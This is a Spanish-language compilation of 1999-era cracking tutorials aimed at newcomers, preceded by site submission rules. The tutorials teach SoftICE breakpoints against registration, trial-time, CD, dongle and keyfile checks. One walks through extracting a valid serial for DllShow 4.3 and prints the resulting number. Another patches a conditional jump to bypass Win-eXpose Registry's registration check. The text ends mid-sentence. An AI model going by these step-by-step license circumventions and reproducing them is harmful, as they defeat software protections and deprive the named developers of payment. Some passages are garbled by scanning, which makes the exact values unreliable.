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Requisitos para que tu manual sea aceptado. 


Faq actualizada el 05/10/2002 


Todos sabéis que en este site nunca se ha aplicado ningún tipo de norma estricta para que 
vuestros manuales sean aceptados, y de hecho esto va ha seguir mas o menos así, aunque creo 
que para que esto funcione ha de haber una minimas normas: 


- 1 No se aceptaran manuales cuyo contenido sea solo por ejemplo: 
vamos a la dirección tal tal y tal y cambiamos je por jmp, o similar osea careciendo de 
explicaciones. 


- 2 El manual deberá estar bien explicado, de tal manera que sea de fácil asimilación para 
un newbie, y nos aseguraremos de que el proceso que se explica en el manual funcione 
perfectamente, lo que no puede ser es enviar manuales sin haber revisado si el proceso 
funciona bien. 


- 3 El Código de la protección que en el manual se exponga deberá estar medianamente 
explicado, con el fin de que el lector sepa por que tenemos que hacer cambios en el código y 
que ocurre en el código hasta llegar a ese punto, no es una explicacion decir miramos 
encima y buscamos un salto y tal y tal, por que buscamos un salto ??, y por que encima ??. 
Creo que me entendeis. 


Los manuales que mas que un manual parezcan un dictado de como reventar un programa, no 
serán aceptados, Ejemplo: cargamos el programa con el sice , pulsamos F5, metemos el 
nombre y numero de serie pulsamos Control + D y F12 unas 30 veces hasta llegar a xxx 
ahora F10 hasta llegar a xxxxx y tal y tal y tal...... hay que ir mas allá, lo importante no es 
crackear 50 programas en 10 minutos, creo que si nos decidimos a hacer un manual tiene que 
ser por un programa especial, en el que realmene el craneo te llego a hechar humo, y llegaste a 
vencerlo, evitar hacer manuales iguales. 


- 4 La politica de este site siempre ha sido la de respetar tanto al programador como los 
programas que estudiamos en los manuales,, los manuales son para educar, de hecho en la 
mayoría de los manuales se suele poner al final el párrafo 'este manual esta hecho con fines 
educativos y tal y tal ', por eso os sugiero que cuando se estudie un programa no pongamos el 
Numero de registro ni cosas que puedan convertir el manual en un crack instantáneo, creo que 
es mas interesante explicar bien el funcionamiento de la protección, pero sin llegar a dar 
password que revienten el programa, se puede explicar bien todo el proceso de desproteccion 
de la proteccion (valga la redundancia) sin poner datos que tiren por la borda el programa. 


- 4 La plantilla !!! en este site el manual se publicara con la plantilla de la pagina, los 
manuales que no esten en la plantilla de este site no puedo garantizar que sean 
publicados, (es una cuextion de falta de tiempo), creo que a vosotros no os cuesta nada poner 
el manual en la plantilla, y a mi me cuesta muchisimo. 


- 5 Las |mágenes..... , Creo que la mayoría de manuales están sobrados de imágenes (ocupan 
demasiado sitio en los servers), es muy importante que pongamos solo las necesarias, 
concretamente las que muestran código, por que una imagen de un mensaje de error o del 
about del programa, o del cajetín donde se meten los códigos, o de lo bonito que queda una 


vez registrado, pues creo que sobran, por que no aportan nada y ocupan mucho, olvidaros de 
enviar imagenes en formato BMP, se pueden comprimir a formatos como el GIF o JPG que 
reducen su peso en un 90% y la calidad apenas varia. 


Os pido por favor que si hacéis un manual, ejemplo: manual para winomega, poner los 
nombres de las imágenes en relación con el programa analizado, ejemplo winome. gif, 
winomel. gif, etc. por que casi todos llamáis a las imágenes como imagenl1.gif, imagen2.gif, y 
en una carpeta donde van las imágenes solo puede haber una con cada nombre, que problema 
trae esto, pues que aunque envíes el manual en la plantilla, luego tengo que estar cambiando 
el nombre a todas las imágenes y volver a enlazarlas, y la verdad... es demasiado tiempo, con 
que os diga que en una actualización de 20 o 30 manuales , he de cambiar el nombre a unas 
200 imágenes y enlazarlas nuevamente, son muchas horas de trabajo. 


Creo Necesario haceros saber esto, ante la cantidad de manuales poco trabajados que 
últimamente recibo y que no estoy aceptando 


- 6 Por favor, a todos los que no se les acepte un manual no os sintais ofendidos, 
creerme que esto no se hace por motivos personales contra nadie, evidentemente no se pueden 
poner el 100% de los manuales que se reciben, bien se por que ya hay muchos similares, por 
que no este suficientemente trabajado o por otros motivos similares, no obstante siempre 
podeis preguntar por vuestros manuales y los motivos por el cual no se han publicado, debeis 
enviar un Mail a Karpoff_sitetahotmail.com y como asunto poner "MANUALES" 


Invierte tiempo en crear tu manual 


Saludos amigos. 
karpoff 
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INTRODUCCION 


Hi Tutoríal de Crackeo Para Newbies desde Cero 15/08/99 


Por Karpoff, PROYECTO 5 


- Utilización Básica del Soft-Ice. 


- DllShow V4.3 


Hola nuevamente !! Un saludo para todos los que seguís esta serie de Manuales Para 
Newbies desde Cero. 


Con este manual el N*5 Empezamos una nueva fase, Aprenderemos a utilizar el Softlice e 
intentaremos capturar un numero de registro valido para nuestro programa. 


Empezare explicando las funciones del Soft-Ice mas utilizadas y las que utilizaremos 
en este caso. 


AL ATAKE 


Primero iniciamos el ordenata y cargamos el Soft-ice (en la Web hay unos tutoriales sobre 
instalación y configuración del Soft.) si todo ha ido bien estamos en Windows y 

aparentemente todo esta igual que siempre pero...... la realidad es otra, hay algo 
controlando los procesos del sistema, es un Debug el mejor y si no probar a pulsar las 
teclas [Ctrl + D] madre mía!!! pero que demonios es esto tan oscuro y con tantos 
números??7??, Bueno esto nos va ha mostrar todo lo que queramos sobre un programa, un proceso 
de un dll, ocx Etc. Paso a paso las teclas mas utilizadas 


Teclas de Funcion del Soft-Tce 


F1 ---- Help 


F2 ventana en la parte superior de la pantalla que nos muestra los valores que van 
llevando EBX, EAX, ECX, EDX, EDI, ESI ETC. 


F4 ---- Nos muestra como esta todo fuera del soft en ese preciso instante, ósea que si 
tenemos un editor HEX abierto en Windows, veremos una imagen capturada del editor , esto es 
muy útil ejemplo: estamos intentado petar un programa y queremos saber en que preciso 
instante nos va ha salir la pantalla que nos avisa, de que el programa esta en evaluación 
para poder saber en que parte del código se ejecuta la orden, pues mientras seguimos paso a 
paso los procesos pulsamos F3 y nos muestra lo que se cuece en ese momento fuera del Soft, 
ya os digo es una imagen capturada como una foto, para volver pulsamos otra vez F3. 


F5 Hace qu 1 programa que estamos Traceando se ejecute normalmente, hasta que se 
encuentre con algún BreakPoint que hallamos puesto lo mismo hace si pulsamos [Ctrl + D] 
desde dentro del Soft, las dos teclas nos sirven para sacarnos del Soft a Windows. 


F8 ---- Con esta tecla vamos ejecutando el programa paso a paso, entrando en todo tipo de 
procesos , Osea que ejecuta la instrucción actual y se pararía en la siguiente asta que 
pulsemos nuevamente F8. 


F10 ---- Lo mismo que F8 pero sin entrar en llamadas ( Call ) se las salta continuando con 
la ejecución en el Retorno ( Ret ) de dicha llamada, 
F11 ---- La definición para esta tecla es, ejecuta hasta una dirección de memoria. (¿7? no 


lo entiendo fe??") yo la utilizo igual que F12 y los resultados son los mismos. 


F12 ---- Nos Retorna al punto donde ha terminado una llamada ejemplo: Imaginamos que estamos 
petando un programa y hemos puesto unos BreakPoints ( Puntos de Ruptura ) para capturar un 
proceso determinado, estamos ejecutando el programa y derrepente hay una llamada al 
BreakPoint que pusimos, lo normal que veríamos en pantalla seria algo así 


Dentro del Softlce 


SSP User32!Setwindowtexta+0023 


015F:BFF57740 C20C00 RET 000€ 


USER32!GETWINDOWTEXTA momento en que el breakPoint para el programa 


015F:BFF51743 B1A1 MOV CL,A1l 


User32!.Text+0740 


aquí ha habido una llamada externa típica a la librería de Windows User32.d11 concretamente 
a Getwindowtexta, y si os fijáis lo resaltado en rojo nos dice que estamos dentro de 
User32.d11l pero a nosotros no nos interesa para nada esta dll, entonces para saber quien 
hizo la llamada a user32.d11 pulsamos F12 y nos mostraría 


Dentro del Softlce 


015F:0041552B FF15B04700 CALL [User32!GetWindowTexta] ----- La llamada 


015F:00415531 5F POP EDI ---- Retornaríamos Aquí 


D11Show!. Text+0001452B 


Pues aquí vemos que la llamada la hizo 0041552B que es una llamada Externa a User32.d11 
concretamente GetWindowTexta , y nosotros hemos utilizado esa llamada para poner un 
BreakPoint (punto de Ruptura ) A un proceso de la librería user32.d11, El BreakPoint seria 
BPX GetWindowTexta que lo escribiríamos tal y como esta, en la línea de comandos de Soft- 
Ice. cualquier llamada que hubiese a la Función GetWindowTexta nos pararía el programa de 
isofacto para saber de donde se hizo esa llamada pulsaríamos F12. ( Espero que lo estéis 
entendiendo tan bien como yo intento explicarlo J ) Para saber las llamadas externas que 
contienen las D11 solo tenéis que editar la dll que queráis con el Vista Rápida de Windows, 
si lo tenéis instalado sale cuando pincháis con el botón derecho del ratón, sobre un 
archivo, y seleccionáis vista rápida o Quick View o si tenéis instalado el Quick View Plus 
pues mejor, luego todas las llamadas pueden ser utilizadas como BreakPoints dependiendo del 
proceso que queramos seguir. 


BreakPoints o puntos de ruptura 


Los Breakpoinst son la madre del cordero, Se trata de que el programa pare en el momento en 
que hay una llamada a una función de una librería (dl1) que usa el programa. Existen en 
Windows unas librerías ( user32.d11l Kernel32.d11, advapi32.d11, shel132.d11, gdi32.dl1 Etc.) 
Que son necesarias para la ejecución de un programa en entorno Windows, El ejcutable del 
programa hace uso de estas librerías mediante llamadas a las distintas funciones de cada 
librería, sabiendo que función utiliza para ejecutar un determinado proceso, podremos 
capturarlo en el preciso instante en que comienza la ejecución de dicho proceso, como??77 
Poniendo un breakPoint, como se pone un BreakPoint??? Desde la línea de comandos del Soft- 
Ice con el comando BPX 


BPX getdlgitemtexta BreakPoint a una Función de la librería User32.d11 


BPX getdlgitemtext BreakPoint a una Función de la librería User.dll o User32.d11 


Observáis que uno termina en [a] y el otro no. Esta [a] sirve para indicar que estamos 
ejecutando un programa de 32 Bytes , a los programas de l16Bytes no debemos de poner la [a], 
ya que no haría efecto el BreakPoint 


Como puedo saber que BreakPoin tengo que poner??? Como he comentado Cada librería tiene su 
propia lista de funciones que las podemos utilizan como puntos de ruptura o BreakPoints, si 
editáis el ejecutable del programa a crackear con el Quick View o Quick View plus, se os 
mostrara las librerías que utiliza y las funciones de cada librería que utilizara, Tenéis 
que guiaros un poco por instinto, estas funciones tiene nombres que nos pueden sugerir ideas 
interesantes veamos algunos ejemplos. 


Estos son breakPoints muy frecuentes, utilizados para seguir procesos de ventanas de Aviso, 
textos que aparecen cuando intentamos registrar un programa y fallamos etc. 


BPX messagebox 
BPX getdlgitemtexta 
BPX getwindowtexta 


Fijaros en sus nombres Messagebox, WindowTexta J etc. ( vais pillando???) 


También tenemos los que hacen referencia a la fecha, tiempo de caducidad etc. 


BPX getlocaltime 
BPX getfiletime 
BPX getsystemtime 


Creo que con un poco de intuición podemos acertar. Voy a Escribir los mas frecuentes 
extraídos de un texto que saque de la pagina de W.K.T. 


1) General Purposes 


BPX hmemcpy 

BPX showwindow 

BPX updatewindow 

BMSG xxxx wm_gettext / a 
BMSG XXXX wm_command 
BMSG XXXX wm_move 


2) Time Related 


BPINT 21 if ah==2A (DOS) 
BPX getlocaltime 

BPX getfiletime 

BPX getsystemtime 


3)Register Flag Related (e.g. Flag on EAX) 


BPX cs:eip if EAX==0 (SICE 3.x) 


4) Memory Flag Related (e.g. Flag on 0030:000045AA) 


BPMB cs:eip rw if 0x30:0x45AA==0 (SICE 3.x) 


5) "Hear The Echo" Technique Related 


BPX 0x30:0x45AA do "d 0x30:0x44BB" (SIC 
BPX CS:0x66CC do "? EAX" (SICE 3.x) 


E 
w 


.Xx) 


6) CD-ROM and Disk Based Schemes 


BPINT 13 if ah==2 (DOS) 
BPINT 13 if ah==3 (DOS) 
BPINT 13 if ah==4 (DOS) 


BPX GetFileAttributesA 

BPX GetFileSize 

BPX GetDriveType 

BPX GetlLastError 

BPX ReadFile 

BPIO -h (Your CD-ROM Port Address) R 


7) Dongle Cracking 


BPIO -h 278 R 
BPIO -h 378 R 


8)Key File Related 


BPINT 21 if ah==3dh (DOS) 
BPINT 31 if ah==3fh (DOS) 
BPINT 21 if ah==3dh (DOS) 
BPX ReadFileA 

BPX CreaterFileA 


9)Keyboard Input Related 


BPINT 16 if ah==0 (DOS) 
BPINT 21 if ah==0xA (DOS) 


Nota: Texto original en inglés de Aesculapius 


Pero de todos estos los que mas utilizaremos son. 


BPX Messageboxa 


BPX Messagebox 


BPX Messageboxexa 


BPX GetWindowTexta 


BPX GetDlgitemTexta 


BPX GetWindowText 


BPX GetDlgitemText 


BPX GetMessagea 


Imaginaros que que queremos conseguir el numero de serie valido para un programa, Que 
BreakPoint pondremos??? Supongo que los grandes CRACKER sabrán cual es el correcto yo no, lo 
único que os puedo aconsejar es que pongáis 2 o 3 y ver cual salta que podrían ser. 


BPX Messageboxa 


BPX GetWindowTexta 


BPX GetDlgitemTexta 


Y con el que salte continuamos y borramos los demas. los comandos para manipular los 
BreakPoints son. 


Bpx Breakpoint ----- Poner 

BC Breakpoint ----- Borrar , BC. * ===== Borrar todos 

BD Breakpoint ----- Desactivar BD * ----- Desactivar Todos 
BE Breakpoint ----- Activar BE * ----- Activar Todos 
BL ----- Listar todos 


Comandos para ver los procesos que se están ejecutando. utilizaremos. 


DD EX 2 nos muestra el contenido de EBX en la ventana de datos 


D EBP-12 --- nos muestra el contenido de EBP-12 en la ventana de datos 


Yo llamo la ventana de datos, a la ventana que muestra los valores en caracteres, junto a 
los valores en hexadecimal, y es que algunas veces tendremos que buscar el n” que buscamos 
en esa ventana o con una [?] en la línea de comandos. 


? EBX ---- nos muestra el valor de EBX en la línea de comandos 


? EBP-12 - nos muestra el valor de EBP-12 en la línea de comandos 


Para manipular una determinada parte del código. utilizaremos el comando 


A === ensamblar 


En los manuales anteriores hemos manipulado los datos para petar el programa con un editor 


HEX, en el Soft podemos manipular pero los cambios solo quedan manipulados en memeoria, Ósea 
Temporalmente hasta que ejecutemos nuevamente el programa. Esto es muy útil para probar si 
hemos acertado con el proceso que queremos cambiar. Por ejemplo 


Localizamos un salto 


00425012 74A1 je 00425012 para cambiarlo a un jmp haremos lo siguiente 


A 00425012 [Intro]-—pulsar 


0105:00425012 -----=-===-=- El soft nos mostrara solo la dirección de memoria para que la 
rellenemos con los datos que tengamos pensado aplicar. 


0105:00425012 3jmp 00425012 [Intro] ----- En rojo los datos que hemos metido 


0105:00425014 -=-===-=-= === El soft nos da la siguiente dirección de memoria por si queremos 
seguir cambiando cosas, si no vamos a Cambiar nada mas pulsamos Intro y hemos cambiado un 
salto ( Pero solo en memoria. ) 


Bueno Creo que he explicado lo suficiente del Soft como para empezar con nuestro programa. 
Recomiendo a la Peña que nunca ha utilizado el Soft, que antes de continuar con el Tutoríal, 
practiquéis con el soft lo que he explicado, probar con una copia de cualquier programa a 
pulsar F8, F10 , F11, Poner BP Etc. hasta que lo conozcáis un poco 


Parte II 


Buscando un Numero de Registro valido para. 


D11Show V4.3 Que lo tenéis en: 


http://tucows.teleweb.pt/files4/dllshow.ZIP 


Cuento con que ya habéis salseado con el Soft, esta configurado ( en la Web tenéis un manual 
sobre configuración e Instalación.) y lo tenéis cargado. 


Empezamos: Hoy registraremos nuestro programa con un n/s valido, este numero variara según 
el nombre de usuario que pongamos, Ósea que cada cual puede poner el suyo. 


Ataque Capturar la rutina que se encarga de verificar el n/s que hemos metido, y seguir su 
ejecución hasta el momento en que compare nuestro n/s con uno valido. 


Abrimos el Soft y cargamos el ejecutable Dllshow.exe. Pulsamos el boton de los engranajes ( 
load para los amigos ) y nos sale una ventanita con un aviso, [Symbol Translations /Load 
Error] Pulsamos [Sil y entramos directamente al Soft, pulsamos F5 o [Ctrl + D] para que se 
ejecute el programa que tenemos cargado, y salimos nuevamente a Windows, pero esta vez se 
esta iniciando D11Show. Ahora hay que poner los datos del registro, pulsamos Help y 
Register... y nos sale una ventana que nos pide tres datos, rellenamos como queramos. 


User Name: OWL (buho) 


Organization: 0WL 


Registrations :123456789 


Y ahora tenemos que poner un BreakPoint para poder seguir paso a paso todo el proceso de 
crear y comparar el n/s. probamos con Getwindowtexta, Pulsamos [Ctrl+D] y entramos en el 
Soft, Venga a poner el BP (como se ponía sabéis no?) 


BPX getwindowtexta una vez puesto pulsamos F5 o [Ctrl+D] Para Salir a Windows ahora pulsamos 
aceptar en la ventana de registro y L Cascaras!!! No ha pasado nada nos ha salido la ventana 
de que el n/s no es correcto. Probaremos con otro BP pulsamos nuevamente [Ctrl1+D] y borramos 
el BP que habíamos puesto 


BC "* [Introl --=-=-- Borrar BP 


Ahora probamos con otro 


BPX getdlgitemtexta y pulsamos nuevamente F5 o [Ctrl+D] Para Salir a Windows ahora pulsamos 
aceptar en la ventana de registro y J esta vez si saltamos al soft concretamente en. 


User32! Getdlgitemtexta 


015F:BFF51743 B1A1 MOV CL,A1l 


Que es esto? La primera llamada que hace el programa, desde que pusimos el BP a la función 
Getdlgitemtexta. En este momento nos encontramos dentro de User32.d11l 


Recordar para saber quien ha hecho la llamada que tecla teníamos que pulsar... Bien F12 y 
nos lleva a. 


015F:0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


015f:00415531 5F POP EDI 


T 


015D:00415532 5E POP ESI ---- Captura User Name 


AQUÍ vemos que ESI NOS HA CAPTURADO el primer campo del formulario, comprobarlo poniendo en 
la línea de comandos del Soft 


D esi veremos en la ventana de caracteres OWL (buho) 


Podríamos ir ejecutando el programa paso a paso , pero se haría eterno ya que si solo a 
Capturado el primer campo, supongo que utilizara el mismo sistema para capturar los otros 
dos, Ósea que pulsamos nuevamente F5 y aparecemos otra vez en. 


User32! Getdlgitemtexta 


015F:BFF51743 B1A1 MOV CL,A1l 


La segunda llamada que hace el programa, desde que pusimos el BP a la función 
Getdlgitemtexta. En este momento nos encontramos dentro de User32.d11 


Pulsamos F12 para terminar esta llamada y nos lleva a. 


015F:0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


015f:00415531 5F POP EDI 


015D:00415532 5E POP ESI ----- Captura Organization 


T 


si antes Capturo el User Name y el valor lo llevaba ESI miremos otra vez que hay en ESI 


D ESI --- OWL ahora ha capturado el segundo campo vamos a por el ultimo que es el que nos 
interesa, a partir de los datos que a recogido generara un n/s y lo comparara con el que 
hemos puesto, tenemos que encontrar el punto donde lo compara, pulsamos F5 y 


User32! Getdlgitemtexta 


015F:BFF51743 B1A1 MOV CL,A1l 


La tecera llamada que hace el programa, desde que pusimos el BP a la función 
Getdlgitemtexta. En este momento nos encontramos dentro de User32.d11 


Pulsamos F12 para terminar esta llamada y nos lleva a. 


015F:0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


015f:00415531 5F POP EDI 


015D:00415532 5E POP ESI ----- Captura el numero que pusimos 


T 


si repetimos el paso anterior y miramos que hay en ESI, vemos el n/s que hemos metido 


D: “EST ===== 123456789 


Ahora que ya tiene el n/s solo tenemos que seguir ejecutando el programa y ver que hace con 
el n/s, vamos pulsando F10 ( Tambien podriamos ir traceando con F8, Pero nos volveriamos un 
poco locos, ya que entrariamos en todas la llamadas (call) paso a paso. Pero si quereis 
probar..) 


0041552B FF15B0F24100 CALL [USER32! Getdlgitemtexta-] 


00415531 5F POP EDI 


00415532 5E POP ESI ----- Captura el numero que pusimos 


00415533 B801000000 MOV EAX, 00000001 


00415538 5B POP EBX 


00415539 C3 RET ------ Retorno de una llamada esto nos va ha trasladar al final de una 
llamada que estaba ejecutándose, seguro que nos lleva a la parte donde se genera y compara 
el n/s. Para los que no tengáis experiencia en crackeo os doy un consejo, desensamblar el 
programa este con el W32dasm y analizar esta parte del código, todo el proceso que estamos 
siguiendo, lo Vais a ver mucho mas claro con un listado muerto. ( pero claro primero 
terminemos esto ) 


A lo que estabamos el Ret nos lleva a: 


0040D342 E8B9810000 CALL 00415500 --—- VEIS EL RET ERA EL FINAL DE ESTA LLAMADA 


0040D347 8D4C2440 LEA ECX, [ESP+40] 


0040D34B 51 PUSH ECX 


SEGUIMOS CON F10 


0040D351 56 PUSH ESI 


0040D352 8BD8 MOV EBX,EAX ----- EAX LLEVA NUESTRO N/S MIRARLO 


0040D361 7518 JNZ 0040D37B ----- SALTA A 


? EAX 123456789 


CONTINUAMOS CON F10 


0040D37B 3B3CCE5O0D CMP EAX,005FCE3C compara 


0040D380 750CC JNZ 0040D38E ------- SALTA A si no es O (osea si) 
0040D38E 57 PUSH EDI ----- GUARDA NUESTRA ORGANITATION 
0040D38r 56 PUSH ESI ----- GUARDA NUESTRO USER NAME 


0040D390 E89BB7B0000 CALL 00414F30 -— LLAMA A LA RUTINA QUE GENERA EL N/S 


0040D395 83C408 ADD, 08 


0040D398 3BD8 CMP EBX,EAX ----- COMPARA LOS N/S EL NUESTRO CON EL VALIDO 


SOLO NOS QUEDA SABER CUAL ES EL QUE SE CORRESPONDE CON LOS DATOS QUE 


fan 


EMOS PUESTO. 


? EBX = 123456789 el nuestro 
? EAX = 3703297526 el que vale 
Acordaros de que si pusisteis el user name con mayusculas a la ora de meter el n/s , a de 


estar exactamente igual. 


Como siempre espero que lo ayais cojido, yo intento explicar lo mejor que puedo, pero no soy 
ningun experto por lo tanto hay algunas comprovaciones que realiza el codigo que no puedo 
explicarlas por que no las se, supongo que conprobara que el n/s tenga un minimo y un maximo 
de longitud, que esten todos los campos completos, que sean numeros y no letras etc. 


Cualquier Duda, Sugerencia, Critica etc. A 


Email Kf karpoffGhotmail.com URL: http://welcome.to/karpoff 
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Programa: Win-eXpose Registry V1.0 


PROTECCION: Name / Serial 


Descripcion: | Spya del Registro de Windows 
Dificultad: PR 
DOWNLOAD : http: //www.shetef.com/wxr95-10.zip 


Herramientas: Softlce v3x +, W32Dasm , Editor Hexadecimal 
CRACKER: karpoff FECHA: 21/08/99 


INTRODUCCION 


Hi Tutoríal de Crackeo Para Newbies desde Cero 21/08/99 


Por Karpoff it PROYECTO 6 ¿Hit 


- Continuando Con el SoftlIce. 


Win-eXpose Registry V1.0 


Hola nuevamente a todos/as, que tal el proyecto 5 ?????, seguro que la mayoría 
conseguisteis el n/s correcto. Debido a que he recibido algunos Emails pidiéndome que 
continuase con proyectos basados en W32Dasm, he escogido este programa. 


Es una utilidad muy buena para rastrear los procesos de cualquier aplicación que se 
ejecute en nuestra maquina, esta utilidad muestra los cambios que puede hacer un 
proceso tal, en el registro. 


La podedeis coger de: 


http: //www.shetef.com/wxr95-10.zip 


AL ATAKE 


Lo estudiaremos con el Softlce y con W32Dasm, así podéis escoger la herramienta que mas os 
guste. De todas formas sigo pensando que si habéis seguido los manuales estáis mas que 
preparados para utilizar el Softlce, yo os recomiendo este, las protecciones Cada vez son 
mas enrevesadas, y con un listado muerto es imposible de seguir. 


El programa de hoy es bastante antiguo tiene una protección ridícula, para registrar el 
programa tenemos que rellenar un formulario que casi parece nuestro D.N.I. nos pide nombre, 
ler apellido, 2do apellido, nombre de la compañía ( Leticia J ) un numero de serie y un 
passwod. La clave valida se genera según el numero de serie que metamos, una vez generado el 
numero valido, no lo guarda en el registro ni lo encripta en dios sabe donde, sino que lo 
guarda su archivo .ini. 


Herramientas: las de siempre. Softlce o W32Dasm y un HEX editor. 


Ataques, Localizar la rutina que se encarga de verificar si el n/s que hemos metido es 

correcto o no, y manipularla para nuestro beneficio, o bien eliminarla si es posible, o 
podemos localizar el punto donde se genera el n/s valido y capturarlo, En esta ocasión 

haremos las dos cosas. 


El programa nos da una evaluación de 30 días, pasado este tiempo, no podemos seguir 
utilizándolo, ya que detien ] proceso que este realizando y nos muestra la pantalla de 
registro cada x tiempo 


PARTE 1 ( CON EL SOFTICE) 


Empezamos con el Softlce. Arrancamos el ordenata y Cargamos el SoftlIce, abrimos Wxr95.exe 
con el soft. Pulsamos el botón de los engranajes para empezar a tracear el programa. 
Saltamos al softlce y pulsamos F5 para que continúe su ejecución, aparecemos otra vez en 
Windows y con el programa abierto, metamos los datos del registro. 


Your asked to enter: 


Your First,LastName:a 


Company Name, :a 


Address Line 1: a 


Address Line 2: OWL(Bhuo) 


Serial Number: 123456789 


Password: 123456789 


Podéis rellenar con los datos que queráis, según que datos metáis generara un numero u otro. 
Ahora debemos poner un BP o punto de ruptura, para Capturar la rutina que comprueba nuestro 
numero y genera el numero valido, yo he probado con Messageboxa , pero podéis intentarlo con 
otros BPs, ( es mas, os obligo a que practiquéis con otros BreakPoints, para ver las 
diferencias entre que procesos Capturan unos u otros, aprenderéis mucho probando.) Pulsamos 
[Ctrl1+D] para saltar al Softice y ponemos. 


BPX messageboxa 


Volvemos a pulsar [Ctrl1+D] Para salir del Softice y pulsamos aceptar en los datos del 
registro, en este momento el breackPoint que pusimos hace efecto y saltamos al Soft. Justo 
en: 


User32! Messageboxa 


015F:BFF5412E 55 PUSH EBP 


ES 


Aparecemos directamente dentro de user32.dl11l en una llamada externa a messageboxa, a 
nosotros no nos interesa para nada navegar dentro de esta dll lo que nos interesa averiguar 
es quien llamo a messageboxa. 


Para ver quien hizo la llamada a messageboxa pulsamos F11 o F12 Y ooh L salimos a Windows 
con el mensaje de que hemos fallado en el registro, que nos sugiere esto, (antes de seguir 
leyendo pensar porque en vez de llavarnos a el principio de la llamada nos saca a windows 
con el mensaje de error. ) pues que la llamada que se hizo a messageboxa debe se ser muy 
sencilla, y pequeña, ( esto siempre son mis deducciones que podrían no ser del todo así, 
pero como ya he comentado mis conocimientos son bastante pobres J ) 


Como siempre mi ataque es pensar que tiene que haber una parte de la rutina donde comprueba 
si es valido el numero metido o si es falso, esta comprobación estaría seguida de un salto 
que dependiendo del valor que reciba saltara a el mensaje de error o continuara su ejecución 
normal aceptando el numero de registro, o viceversa . (aclaro que este tipo de comprobación 
que comento es la mas sencilla que conozco, podría no tener nada que ver con este estilo, 
pero dado que es un programa antiguo y que utiliza un archivo .ini para guardar el registro 
creo que es la que utiliza.) 


Continuamos nos habíamos quedado en el mensaje de error, como todavía tenemos el BreakPoint 
messageboxa activado pulsamos [OK] en el mensaje de error y nos lleva a: 


:004025A3 CALL [USER32 !MessageBoxA] 
:004025A9 MOV BYTE PTR [EBP-04],00 --á Aquí aparecemos. 
:004025AD CALL 00402750 

:004025B2 MOVE DWORD PTR [EBP-04],FFFFFFFF 
:004025B9 CALL 00402762 

:004025BE MOV EAX, [EBP-0C] 

:004025C1 POP EDI 

:004025C2 MOV FS: [00000000],EAX 
:004025C8 POP ESI 

:004025C9 POP EBX 

:004025CA MOV ESP, EBP 

:004025CC POP EBP 

:004025CD RET 


Creo que estamos al final de la rutina de comprobacion, entonces remontemos la rutina para 
localizar una comprobación tipo TEST XXX,XXX o CMP XXX, XXXXXXX seguida de un salto que tenga 
las Características si el numero es valido salta si no es valido continua, ([ O al rreves), 
Miremos que encontramos por hay arriba, subimos mas mas un poquito mas, y encontramos el 
primer je que según el valor que reciba de Test XXX,XXX salta o sigue su ejecución. 


:004024F7 TEST EAX,EAX a si el numero es correcto le dice a el salto que salte a la 
dirección 004025ce, si es falso continua ejecutándose en la siguiente línea, y empieza a 
generar los mensajes de error. 


:004024F9 JZ 004025CE a Según el valor que le asigne TEST salta o no. 


:004024FF PUSH 0040A1A4 


:00402504 MOV ECX, 0040A90 


:00402509 PUSH 0040A158 


:0040250E PUSH 0040A140 


(55 


:00402513 CALL 00406E40 


Y vosotros os preguntáis, y como save este tío que para que acepte el numero de registro lo 
valido es que salte y no al reves. Contestación pues podéis probar a cambiar el salto por un 
salto incondicional (jmp) que salta lleve el valor que lleve. O podéis desensamblar el 
programa y observar esta parte del código, veréis que si no salta y sigue su ejecución 
normal, se va ha encontrar con todos los avisos de error, pero si salta evita todos los 
aviso. ( tenéis que verificar lo que os he dicho es obligatorio J ) 


Continuamos, estabamos dentro del soft y habíamos localizado el posible salto. 


Bueno hemos localizado el salto pero esta parte del código ya se ha ejecutado así que 
tenemos que entrar en el soft antes de que se ejecute este salto para así poder manipularlo, 
como lo hacemos muy fácil tenemos que ponerle un BreakPoint para entrar en el soft justo 
antes de que se ejecute, y tenemos que borrar el BreakPoint messageboxa para que no se 
active en plena ejecución, porque ya hemos localizado lo que queríamos, pues no nos sirve ya 
para nada. Para desactivar el BreackPoint 


BC 00 á Borra el primer Breakpoint que hallamos puesto en este caso messageboxa, para ver 
que numero de BP tiene asignado Cada uno en caso de que hubieseis utilizado otros. 


BL á nos lista los breakPoint tanto activos como desactivados, ej, 


BL [INTRO] 


00 messageboxa 


01 messagebox 


02 getwindowtexta 


Una vez borrados los BreakPoints, le ponemos otro a :004024F9 JZ 004025CE , para poner 
un BP a una dirección de memoria podemos hacer doble clip encima de la dirección que nos 
interese o como siempre con el comando BPX 


BPX 004024F9 


Si ya hemos hecho todo esto pulsamos F5 o [Ctrl1+D] para salir del Soft, estamos nuevamente 
en el formulario de registro, ahora solo tenemos que pulsar OK y aparecemos justo en el 
salto :004024F9 JZ 004025CE ,Bueno tenemos que convertirlo en un salto incondicional 
(jmp) que salte por narices, lo primero desactivamos o borramos el BP que le hemos puesto, 
ya no nos sirve para nada, ahh muy importante, y si este no fues 1 salto que buscábamos??? 
,si este es el salto correcto todavía no se tiene que haber generado el mensaje de error 
como saberlo, recordar el tutorial anterior.... solo tenemos que pulsar la tecla F4 para ver 
como van las cosas fuera del soft si pulsamos F4 y esta el aviso de numero incorrecto mal 
asunto, si no esta vamos bien, pulsamos F4 y vemos que no se ha generado bien J , volvemos 
al soft pulsando otra vez F4. Tenemos que convertir 


004024f9 0F84CF000000 JZ 004025C 


eu 


CAMBIARLO POR 004024F9 ¿2727222227777 JMP 004025CE a salto incondicional 


Las interrogaciones significan que tendremos que averiguar que Bytes son los que harán que 
Jjz se convierta en jJmp para que el programa funcione correctamente, debemos tener en cuenta 


que si hay que cambiar Bytes nunca podemos meter mas o menos Bytes de los originales. Hasta 
ahora hemos cambiado: 


JE POR JNE = 74 POR 75 


JNE POR JMP = 75 POR EB 


JE POR JNE = 0F84CF000000 POR 0F85CF000000 


FU 


ERO COMO CAMBIAMOS UN 0F84CF000000 JE POR UN JMP 


La manera que yo utilizo es, cuando lo cambiemos en el soft fijaros en como cambian esos 
Bytes y apuntarlo, por que si luego queremos generar el Crack necesitaremos un HEX edit y 
cambiar los Bytes por los que hemos apuntado. (con el W32dasm también podemos averiguar que 
Bytes son la sustitución correcta, luego lo explico.) 


Estamos dentro del Soft justo en el salto que nos interesa, hemos desactivado el BP del 
salto haciendo doble clip sobre el ( se quitara el azul cyan ) o con el comando 


